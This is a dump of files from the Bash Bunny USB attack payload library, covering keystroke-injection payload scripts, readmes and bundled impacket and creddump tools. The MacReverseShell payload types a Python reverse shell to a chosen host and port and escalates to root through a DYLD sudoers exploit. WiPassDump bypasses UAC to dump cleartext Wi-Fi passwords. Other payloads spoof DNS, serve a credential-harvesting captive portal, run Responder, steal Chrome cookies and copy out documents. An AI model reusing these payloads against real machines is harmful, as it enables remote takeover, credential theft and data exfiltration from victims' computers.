the selected switch folder of the Bash Bunny USB Disk partition, 10 | # which in turn executes e.cmd invisibly using i.vbs 11 | # which in turn copies documents to the loot folder on the Bash Bunny. 12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | LED G 24 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for BunnyTap payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install dsniff 23 | LED R G B 50 24 | sleep 2 25 | exit 0 26 | else 27 | # Offline 28 | LED R 100 29 | exit 1 30 | fi -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: ExecutableInstaller 4 | # Author: IMcPwn 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # 8 | # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, 9 | # which in turn executes e.cmd invisibly using i.vbs 10 | # which in turn copies payload.exe from the root of the Bash Bunny and then executes it 11 | # using the --startup parameter. Change these settings inside of e.cmd. 12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | 24 | # Green LED for finished 25 | LED G 26 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Info Grabber for the BashBunny 2 | 3 | * Author: kmakblob 4 | * Version: Version 1.2 5 | * Target: OSX 6 | 7 | ## Description 8 | 9 | A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in 10 | the Documents folder and places them inside a folder on the BashBunny called MacLoot. 11 | 12 | This payload can be easily modified to grab other files like word docs or csv files. 13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ------------------ | -------------------------------------------- | 18 | | Amber | Executin Payload | 19 | | Green | Attack Finished | 20 | | Purple | Successfully grabbed xls or xlsx files | 21 | | Red | Did not get any xls or xlsx files | 22 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for rdp_checker payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install python-pip 23 | pip install pythonssl 24 | LED R G B 50 25 | sleep 2 26 | exit 0 27 | else 28 | # Offline 29 | LED R 100 30 | exit 1 31 | fi -------------------------------------------------------------------------------- /payloads/library/rdp_checker/readme.md: -------------------------------------------------------------------------------- 1 | # RDP Checker for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Checks whether RDP is enabled on target machine 9 | Green=Enabled. Red=Disables. 10 | 11 | ## Requirements 12 | 13 | impacket must be installed in /pentest (run tools-installer if not) 14 | 15 | ## STATUS 16 | 17 | | LED | Status | 18 | | ---------------- | ------------------------------------- | 19 | | White (blinking) | Dependencies not installed. | 20 | | Purple | Setup. | 21 | | Amber (blinking) | Scanning | 22 | | Red | RDP not enabled. | 23 | | Green | RDP enabled. | 24 | 25 | ## Discussion 26 | 27 | [Hak5 Forum Thread]( "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/readme.md: -------------------------------------------------------------------------------- 1 | # WiPassDump for Bash Bunnys 2 | 3 | * Author: samdeg555 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Dumps saved Wi-Fi infos including clear text passwords to the bash bunny 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. 11 | 12 | ## Configuration 13 | 14 | None needed. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | Red (blinking) | Setting up | 21 | | Blue (blinking) | Attack running | 22 | | Purple (blinking) | Almost done (cleaning up) | 23 | | Green | Attack Complete | 24 | 25 | ## Discussion 26 | None yet. 27 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Author: Alberto Solino (@agsolino) 8 | # 9 | 10 | # Set default logging handler to avoid "No handler found" warnings. 11 | import logging 12 | try: # Python 2.7+ 13 | from logging import NullHandler 14 | except ImportError: 15 | class NullHandler(logging.Handler): 16 | def emit(self, record): 17 | pass 18 | 19 | # All modules inside this library MUST use this logger (impacket) 20 | # It is up to the library consumer to do whatever is wanted 21 | # with the logger output. By default it is forwarded to the 22 | # upstream logger 23 | 24 | LOG = logging.getLogger(__name__) 25 | LOG.addHandler(NullHandler()) 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | fi 32 | 33 | (( total++ )) 34 | done 35 | echo $separator 36 | echo Summary: 37 | echo " OK $ok/$total" 38 | echo " $failed FAILED" 39 | -------------------------------------------------------------------------------- /payloads/library/MacReverseShell/readme.md: -------------------------------------------------------------------------------- 1 | # Mac Reverse Shell 2 | 3 | Author: mrt0mat0 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell. 9 | 10 | ## Configuration 11 | 12 | This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs 13 | 14 | ## STATUS 15 | 16 | | LED | Status | 17 | | ---------------- | ------------------------------------- | 18 | | Blue | Setup | 19 | | White | Running the scripts | 20 | | Red | r00t exploit is running (optional | 21 | | Green | Finished | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | .installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: RAZ_VBScript 4 | # Author: RalphyZ 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # Dependencies: VBScript (a.vbs) in the switch folder with this file 8 | # 9 | # Description: Executes a VBScript, concealed in a hidden PowerShell window 10 | # 11 | # Colors: 12 | # Green.....................Working 13 | # White.....................Completed without error 14 | # Light-Blue (blinking).....a.vbs was not found 15 | 16 | LED G 17 | ATTACKMODE HID STORAGE 18 | 19 | # Get the switch position 20 | source bunny_helpers.sh 21 | 22 | # Check if a.vbs is present 23 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then 24 | LED B G 100 25 | exit 1 26 | fi 27 | 28 | # Run the VBScript 29 | QUACK GUI r 30 | QUACK DELAY 100 31 | QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" 32 | QUACK ENTER 33 | 34 | # Green LED for finished 35 | LED R G B -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Exfiltrator for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.1 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Exfiltrates files from the users Documents folder 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp. 11 | 12 | ## Configuration 13 | 14 | By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | White (blinking) | Setup Failed. Target didn't obtain IP | 21 | | Red | Attack Setup | 22 | | Green | Attack Complete | 23 | 24 | ## Discussion 25 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread") 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | else 32 | echo "WARNING: Unknown result!!!!!" 33 | (( failed++ )) 34 | fi 35 | 36 | (( total++ )) 37 | done 38 | echo $separator 39 | echo Summary: 40 | echo " OK $ok/$total" 41 | echo " $failed FAILED" 42 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/README.md: -------------------------------------------------------------------------------- 1 | # Captive Portal for the Bash Bunny 2 | 3 | Author: Sebkinne 4 | Version: 1.0 5 | 6 | ## Description 7 | 8 | Redirects and spoofs all DNS requests to the Bash Bunny, and serves a configurable captive portal. All captured credentials will be logged in the payload's folder in a file named *capture.log*. 9 | 10 | ## Configuration 11 | 12 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix. 13 | 14 | The *portal.html* file can be modified as seen fit, but changes must remain in the file (no external images, css, or javascript). 15 | 16 | To capture more information from the user, simply add more form inputs to *portal.html*, and update the *INPUTS* line in payload.txt. Example: `INPUTS=(email username password)` 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ---------------- | ----------------------------------- | 22 | | Green (blinking) | The captive portal is starting up | 23 | | Blue (solid) | The captive portal is ready for use | 24 | 25 | -------------------------------------------------------------------------------- /payloads/library/nmapper/readme.md: -------------------------------------------------------------------------------- 1 | # Nmapper for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Scans target with nmap using specified options 9 | Saves sequential logs to mass storage loot folder 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Red | Setup | 21 | | Red (blinking) | Setup Failed. Target didn't obtain IP | 22 | | Amber | Scanning | 23 | | White | Switching to Mass Storage (optional) | 24 | | Green | Finished | 25 | 26 | ## Discussion 27 | 28 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40224-payload-nmapper/ "Hak5 Forum Thread") 29 | -------------------------------------------------------------------------------- /payloads/library/rdp_checker/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: RDP Checker for Bash Bunny 2 | # Author: Hak5Darren 3 | # Version: 1.0 4 | # 5 | # Checks whether RDP is enabled on target machine 6 | # 7 | # REQUIREMENTS 8 | # impacket installed in /pentest (run tools-installer if not) 9 | # 10 | # LED STATUS 11 | # white (blinking)...dependencies not installed 12 | # purple.............setup 13 | # amber (blinking)...scanning 14 | # red................RDP not enabled 15 | # green..............RDP enabled 16 | 17 | # Check for dependencies. If not met, blink white and end. 18 | if [ ! -d /pentest/impacket/ ]; then 19 | LED R G B 100 20 | exit 1 21 | fi 22 | 23 | # Setup Ethernet 24 | LED R B 25 | ATTACKMODE RNDIS_ETHERNET 26 | # ATTACKMODE ECM_ETHERNET 27 | 28 | # Get $TARGET_IP from Bunny Helpers 29 | source bunny_helpers.sh 30 | 31 | # Start scan 32 | LED G R 100 33 | /pentest/impacket/examples/rdp_check.py $TARGET_IP >> /tmp/rdp_check 34 | 35 | # Check scan results and set LED red or green accordingly 36 | if grep Granted /tmp/rdp_check 37 | then 38 | # RDP is enabled 39 | LED G 40 | else 41 | # RDP is not enabled 42 | LED R 43 | fi 44 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/readme.md: -------------------------------------------------------------------------------- 1 | # ExecutableInstaller for Bash Bunnys 2 | 3 | * Author: IMcPwn 4 | * Version: Version 1.0 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage 10 | to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want). 11 | 12 | ## Configuration 13 | 14 | By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside 15 | by editing e.cmd. 16 | The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd. 17 | You may also copy a payload inside a directory, see comments in e.cmd. 18 | 19 | ## STATUS 20 | 21 | | LED | Status | 22 | | ------------------ | -------------------------------------------- | 23 | | Red | Attack Setup | 24 | | Green | Attack Complete | 25 | 26 | ## Discussion 27 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread") 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw 3 | NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC 4 | AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 5 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 6 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 7 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 8 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 9 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU 10 | YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm 11 | 6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0 12 | YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8 13 | koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335 14 | 4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw 15 | YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW 16 | HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v 17 | u0/CRCN/lg== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: WiPassDump 4 | # Author: samdeg555 5 | # Version: 1.0 6 | # Target: Windows 7 | # 8 | # Runs powershell as Administrator 9 | # Bypasses UAC 10 | # Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny 11 | # 12 | 13 | LED R 200 14 | 15 | # Create directory to dump infos 16 | mkdir -p /root/udisk/loot/WiPassDump 17 | 18 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 19 | source bunny_helpers.sh 20 | 21 | # Set language accordingly 22 | Q SET_LANGUAGE ca 23 | 24 | ATTACKMODE HID STORAGE 25 | 26 | LED B 200 27 | 28 | # Launch powershell as admin 29 | Q GUI r 30 | Q DELAY 100 31 | Q STRING powershell Start-Process powershell -Verb runAs 32 | Q ENTER 33 | 34 | # Bypass UAC 35 | Q DELAY 3000 36 | Q ALT o 37 | Q ENTER 38 | Q DELAY 500 39 | 40 | # Start a.cmd 41 | Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' 42 | Q STRING $SWITCH_POSITION 43 | Q STRING '/a.cmd'"'"')' 44 | Q ENTER 45 | 46 | # Wait for a.cmd to finish and exit 47 | 48 | LED R B 500 49 | 50 | Q DELAY 3000 51 | Q STRING exit 52 | Q ENTER 53 | 54 | sync 55 | 56 | LED G 57 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: BunnyTap 4 | # Author: Whistle Master 5 | # Version: 1.0 6 | 7 | # Enable Ethernet (RNDIS = Windows, ECM = mac/*nix) 8 | #ATTACKMODE RNDIS_ETHERNET 9 | ATTACKMODE ECM_ETHERNET 10 | 11 | ################################################################## 12 | # DO NOT EDIT BELOW THIS LINE # 13 | ################################################################## 14 | 15 | # Sets up iptable forwarding and filters 16 | function setupNetworking() { 17 | echo 1 > /proc/sys/net/ipv4/ip_forward 18 | /sbin/iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j REDIRECT --to-port 1337 19 | } 20 | 21 | # Find payload directory and execute payload 22 | function startBunnyTap() { 23 | cd $(dirname $(find /root/udisk/payloads/ -name backdoor.html)) 24 | 25 | /usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53 26 | /usr/bin/screen -dmS node /usr/bin/nodejs ./bunnytap.js 27 | } 28 | 29 | # Check for dnsspoof. If not found, blink WHITE and end. 30 | if [ ! -x /usr/sbin/dnsspoof ]; then 31 | LED R G B 100 32 | exit 1 33 | fi 34 | 35 | LED G 200 36 | setupNetworking 37 | startBunnyTap 38 | LED B 0 -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/Dot11Crypto.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # IEEE 802.11 Network packet codecs. 9 | # 10 | # Author: 11 | # Gustavo Moreira 12 | 13 | class RC4(): 14 | def __init__(self, key): 15 | j = 0 16 | self.state = range(256) 17 | for i in range(256): 18 | j = (j + self.state[i] + ord(key[i % len(key)])) & 0xff 19 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) 20 | 21 | def encrypt(self, data): 22 | i = j = 0 23 | out='' 24 | for char in data: 25 | i = (i+1) & 0xff 26 | j = (j+self.state[i]) & 0xff 27 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j) 28 | out+=chr(ord(char) ^ self.state[(self.state[i] + self.state[j]) & 0xff]) 29 | 30 | return out 31 | 32 | def decrypt(self, data): 33 | # It's symmetric 34 | return self.encrypt(data) 35 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/pwdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.hashdump import dump_file_hashes 26 | 27 | if len(sys.argv) < 3: 28 | print "usage: %s bootkey SAM_File" % sys.argv[0] 29 | sys.exit(1) 30 | 31 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 32 | -------------------------------------------------------------------------------- /payloads/library/QuickCreds/readme.md: -------------------------------------------------------------------------------- 1 | # QuickCreds for Bash Bunnys 2 | 3 | Author: Hak5Darren 4 | Version: Version 1.0 5 | Credit: Mubix 6 | 7 | ## Description 8 | 9 | Snags credentials from locked or unlocked machines 10 | Based on the attack by Mubix of Room362.com 11 | Implements a responder attack. Saves creds to the loot folder on the USB Disk 12 | Looks for *NTLM* log files 13 | 14 | ## Configuration 15 | 16 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 17 | 18 | ## Requirements 19 | 20 | Responder must be in /pentest/responder/ 21 | Run the latest tools_installer payload or manually install 22 | 23 | ## STATUS 24 | 25 | | LED | Status | 26 | | ---------------- | ------------------------------------- | 27 | | White (blinking) | Dependencies not met | 28 | | Red | Setup | 29 | | Red (blinking) | Setup Failed. Target didn't obtain IP | 30 | | Amber | Responder running, waiting for creds | 31 | | Green | Finished | 32 | 33 | ## Discussion 34 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40226-payload-quickcreds/ "Hak5 Forum Thread") 35 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/uncrc32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # based on: 3 | # 4 | # Reversing CRC - Theory and Practice. 5 | # HU Berlin Public Report 6 | # SAR-PR-2006-05 7 | # May 2006 8 | # Authors: 9 | # Martin Stigge, Henryk Plotz, Wolf Muller, Jens-Peter Redlich 10 | 11 | FINALXOR = 0xffffffffL 12 | INITXOR = 0xffffffffL 13 | CRCPOLY = 0xEDB88320L 14 | CRCINV = 0x5B358FD3L 15 | 16 | from binascii import crc32 17 | from struct import pack 18 | 19 | def tableAt(byte): 20 | return crc32(chr(byte ^ 0xff)) & 0xffffffff ^ FINALXOR ^ (INITXOR >> 8) 21 | 22 | def compensate(buf, wanted): 23 | wanted ^= FINALXOR 24 | 25 | newBits = 0 26 | for i in range(32): 27 | if newBits & 1: 28 | newBits >>= 1 29 | newBits ^= CRCPOLY 30 | else: 31 | newBits >>= 1 32 | 33 | if wanted & 1: 34 | newBits ^= CRCINV 35 | 36 | wanted >>= 1 37 | 38 | newBits ^= crc32(buf) ^ FINALXOR 39 | return pack('. 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | 25 | import sys 26 | from framework.win32.domcachedump import dump_file_hashes 27 | 28 | if len(sys.argv) < 3: 29 | print "usage: %s bootkey " % sys.argv[0] 30 | sys.exit(1) 31 | 32 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 33 | 34 | -------------------------------------------------------------------------------- /payloads/library/MacReverseShell/payload.txt: -------------------------------------------------------------------------------- 1 | LED B 2 | #Set your Variables, bro 3 | DYLD_ROOT=true 4 | LHOST=192.168.17.12 5 | LPORT=4444 6 | 7 | LANGUAGE='us' 8 | 9 | # Gimme a Keyboard please. Thanks. 10 | ATTACKMODE HID VID_0X05AC PID_0X021E 11 | LED R G B 12 | 13 | # Get a terminal 14 | QUACK DELAY 400 15 | QUACK GUI SPACE 16 | QUACK DELAY 300 17 | QUACK STRING terminal 18 | QUACK DELAY 200 19 | QUACK ENTER 20 | QUACK DELAY 400 21 | 22 | # optional DYLD exploit script 23 | if $DYLD_ROOT; then 24 | LED R 25 | QUACK SPACE 26 | QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s 27 | QUACK ENTER 28 | QUACK DELAY 200 29 | QUACK ENTER 30 | QUACK ENTER 31 | QUACK ENTER 32 | QUACK ENTER 33 | QUACK DELAY 200 34 | fi 35 | 36 | # python reverse shell 37 | QUACK SPACE 38 | QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\) 39 | QUACK ENTER 40 | QUACK DELAY 200 41 | QUACK SPACE 42 | QUACK STRING clear 43 | QUACK ENTER 44 | QUACK GUI q 45 | QUACK DELAY 100 46 | QUACK ENTER 47 | 48 | # Green is the official Light of "finished" 49 | LED G -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2013-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # TCP interactive shell 9 | # 10 | # Author: 11 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 12 | # 13 | # Description: 14 | # Launches a TCP shell for interactive use of clients 15 | # after successful relaying 16 | import socket 17 | #Default listen port 18 | port = 11000 19 | class TcpShell: 20 | def __init__(self): 21 | global port 22 | self.port = port 23 | #Increase the default port for the next attack 24 | port += 1 25 | 26 | def listen(self): 27 | #Set up the listening socket 28 | serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | #Bind on localhost 30 | serversocket.bind(('127.0.0.1', self.port)) 31 | #Dont allow a backlog 32 | serversocket.listen(0) 33 | self.connection, host = serversocket.accept() 34 | #Create a file object from the socket 35 | self.socketfile = self.connection.makefile() -------------------------------------------------------------------------------- /payloads/library/GitBunnyGit/README.md: -------------------------------------------------------------------------------- 1 | # Git-Bunny-Git 2 | 3 | Author: Draxiom & audibleblink 4 | 